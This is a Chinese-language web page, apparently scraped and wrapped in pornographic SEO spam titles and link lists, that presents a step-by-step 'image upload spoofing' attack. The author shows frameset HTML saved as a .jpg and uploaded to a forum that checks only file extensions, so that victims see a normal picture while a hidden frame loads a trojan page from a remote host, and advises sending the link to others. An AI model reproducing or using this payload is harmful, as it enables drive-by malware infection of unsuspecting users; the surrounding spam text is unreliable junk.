六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

圖片上傳欺騙攻擊

[摘要]這個漏洞適用于所有只檢查上傳文件格式的程序, 把圖片改成HTML代碼, 上傳后可執(zhí)行 做轉向, 發(fā)現(xiàn)的過程是我今天看了一下某門戶網站的BBS上做了過濾, 上傳失敗, 然后回到主頁上, 發(fā)現(xiàn)是動力系統(tǒng)...

這個漏洞適用于所有只檢查上傳文件格式的程序, 把圖片改成HTML代碼, 上傳后可執(zhí)行 做轉向, 發(fā)現(xiàn)的過程是我今天看了一下某門戶網站的BBS上做了過濾, 上傳失敗, 然后回到主頁上, 發(fā)現(xiàn)是動力系統(tǒng), 于是注冊了一個帳號, 然后到個人管理里, 看到添加文章里面 能上傳、文件, 于是開始想利用的過程。 我開始的構思是直接上傳這樣一個程序。

其實這樣有很大一個漏洞, 別人打開這些JPG網頁后, 圖片顯示不出來, 自然別人就會起疑心, 想到了前段時間的CHM網頁木馬的制作的方法, 變相的利用它應該能達到這樣的效果吧?假如代碼為:

<frameset rows="444,0" cols="*">

<frame src="index.htm" framborder="no" scrolling="auto" noresize

marginwidth="0" margingheight="0">

<frame src="cha.htm"  frameborder="no" scrolling="no"   noresize

marginwidth="0" margingheight="0">

</frameset>

這樣的一個index.htm, 上傳后發(fā)現(xiàn)失敗, 直接顯示原代碼。 于是在代碼的開頭結尾加了如下的代碼:

<html>

<frameset rows="444,0" cols="*">

<frame src="index.htm" framborder="no" scrolling="auto" noresize

marginwidth="0" margingheight="0">

<frame src="cha.htm"  frameborder="no" scrolling="no"   noresize

marginwidth="0" margingheight="0">

</frameset></html>

測試后頁面已經成了一個木馬頁面, 但是這個木馬一定要有個CHM的人才行, 網站不可能專門提供你上傳這個類型的文件吧?!于是想到遠程的調用, 后把Index.jpg改為代碼:

<html>

<frameset rows="444,0" cols="*">

<frame src="index.htm" framborder="no" scrolling="auto" noresize

marginwidth="0" margingheight="0">

<frame src="http://www.xxx.com/cha.htm"  frameborder="no"

scrolling="no"   noresize marginwidth="0" margingheight="0">

</frameset></html>

上傳后發(fā)現(xiàn) , 防火墻成功提示病毒, 但是別人打開這個頁面的時候直接是大紅XX, 有腦子的人都會懷疑。 于是想到把這個頁面打開后看成一個圖片, 接著直接把上面的代碼改成:

<html>

<frameset rows="444,0" cols="*">

<frame src="/UpLoadFiles/NewsPhoto/omasuiai.jpg" framborder="no"

scrolling="auto" noresize marginwidth="0" margingheight="0">

<frame src="http://www.xxx.com/cha.htm"  frameborder="no"

scrolling="no"   noresize marginwidth="0" margingheight="0">

</frameset></html>

這樣打開這個頁面的時候正常顯示圖片, 木馬也能中了!前提是要把這個圖片頁面發(fā)給別人, 例如:www.***.com/UpLoadFiles/NewsPhoto/08aXXXXX.jpg, 對方打開后還以為是看到了一張圖片, 其實他已經中木馬了, 再怎么說這個也是上傳的圖片, 而且可以上傳到自己的站里, 不會有人懷疑的!


上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




主站蜘蛛池模板: 一国产一级淫片a免费播放口 | 日韩欧美中文 | 日本一在线中文字幕天堂 | 欧美一卡二卡3卡4卡无卡六卡七卡科普 | 四虎国产在线 | 日本护士后进式猛烈动态图片 | 五级毛片| 色女人综合| 日本视频不卡 | 日韩国产欧美视频 | 五月婷婷丁香综合网 | 午夜影院啪啪 | 亚洲男人的天堂网站 | 日韩精品一区二区三区中文精品 | 小明永久成人一区二区 | 日本久久久久久久久久 | 亚洲中字在线 | 五级床片全部免费播放 | 日本三级网站在线线观看 | 一二三四影视大全免费观看电视剧 | 亚洲专区路线一路线二天美 | 五月综合色啪 | 天天躁夜夜躁狠狠躁2023 | 欧美在线观看网址 | 亚洲色欲色欲www | 我想看一级黄色毛片 | 五月婷婷综合激情网 | 日本卡一卡2卡3卡4精品卡网站 | 青青青手机视频在线观看 | 色综合天天干 | 污视频在线看 | 天天影视色香欲 | 日韩欧美精品 | 日本高清视频在线免费观看 | 在线观看亚洲免费视频 | 视频一区二区三区欧美日韩 | 日本一区二区三区视频在线 | 亚洲高清影院 | 一级做a爰片久久毛片下载 一级做a爰片久久毛片图片 | 色网在线观看 | 亚洲视频一区在线观看 |